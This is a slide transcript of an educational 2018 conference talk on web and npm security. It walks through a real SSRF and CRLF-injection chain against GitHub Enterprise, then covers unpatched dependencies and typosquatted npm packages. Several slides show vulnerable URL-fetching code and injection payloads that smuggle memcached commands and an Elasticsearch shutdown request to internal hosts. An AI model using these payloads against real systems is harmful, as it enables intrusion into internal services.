How to hack an Angular app? @ ngVikings 2018

Transcript

1. how to hack an angular app? @jawache ngVikings 2018

2. Asim Hussain @jawache codecraft.tv microsoft.com

3. None

4. Vulnerability vs. Exploit

5. #1 @orange_8361

6. git push http://example.com @jawache

7. git push http://localhost @jawache

8. http://0 @jawache git push

9. @jawache git push http://0:9200/_shutdown

10. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto,

    server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

11. http://0:8000/composer/send_email? to=orange@nogg& url=http://127.0.0.1:12345/foo @jawache

12. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto,

    server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

13. \r\n @jawache

14. %0D%0A @jawache

15. http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo: @jawache

16. GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1 Host: 127.0.0.1:12345 Accept-Encoding: identity @jawache

17. GET /%0D%0Ahello%0D%0AFoo:\r\n HTTP/1.1\r\n Host: 127.0.0.1:12345\r\n Accept-Encoding: identity\r\n \r\n \r\n @jawache

18. @jawache GET /\r\n hello\r\n Foo: HTTP/1.1\r\n Host: 127.0.0.1:12345\r\n Accept-Encoding: identity\r\n

    \r\n \r\n

19. ...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A @jawache

20. GET / set key 0 900 4 data HTTP/1.1 Host:

    127.0.0.1:11211 Accept-Encoding: identity @jawache

21. GET / set key 0 900 4 data HTTP/1.1 Host:

    127.0.0.1:11211 Accept-Encoding: identity @jawache

22. code code @jawache

23. code code @jawache

24. DeprecatedInstanceVariableProxy @jawache

25. @jawache

26. None

27. @jawache Photo by Kelly Sikkema on Unsplash

28. @jawache #2

29. @jawache Photo by Kristina Flour on Unsplash 0 Day Exploit

30. @jawache Photo by Veri Ivanova on Unsplash 0 Day Exploit

31. None

32. @jawache

33. @jawache

34. @jawache

35. @jawache

36. @jawache

37. "12 of top 50 data breaches were through known vulnerabilities"

    - snyk.io https://snyk.io/blog/owasp-top-10-breaches/ @jawache

38. "77% of 433,000 Sites Use Vulnerable JavaScript Libraries" - snyk.io

    https://snyk.io/blog/77-percent-of-sites-still-vulnerable/ @jawache
39. None

40. @jawache

41. @jawache nsp

42. @jawache Photo by energepic.com from Pexels

43. @jawache

44. @jawache

45. @jawache

46. #3 @jawache

47. @jawache

48. @jawache

49. None

50. @jawache

51. cross-env vs. crossenv @jawache

52. @jawache Photo by Jairo Alzate on Unsplash

53. @scope/package-name @jawache

54. package-name packagename package.name @jawache

55. Update Small vulnerability Don't trust anyone All the things Fix

    @jawache

56. Asim Hussain @jawache codecraft.tv microsoft.com

57. #1 How I Chained 4 vulnerabilities on GitHub Enterprise -

    Orange Tsai http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html CRLF injection vulnerability in the HTTPConnection https://www.cvedetails.com/cve/CVE-2016-5699/

58. #2 Exploit DB https://www.exploit-db.com/ Metasploit https://www.metasploit.com/ Azure App Services https://aka.ms/azure-app-service-docs

    Google App Engine https://cloud.google.com/appengine/ Heroku https://heroku.com Amazon Beanstack http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html The Equifax hack and how to protect your family — all explained in 5 minutes https://medium.freecodecamp.org/the-equifax-hack-and-how-to-protect-your-family-all-explained-in-5-minutes-a2b5187cb6c0

59. #3 Oscar Bolmsten on Twitter https://twitter.com/o_cee/status/892306836199800836 Malicious packages in npm.

    Here’s what to do - Ivan Akulov https://iamakulov.com/notes/npm-malicious-packages/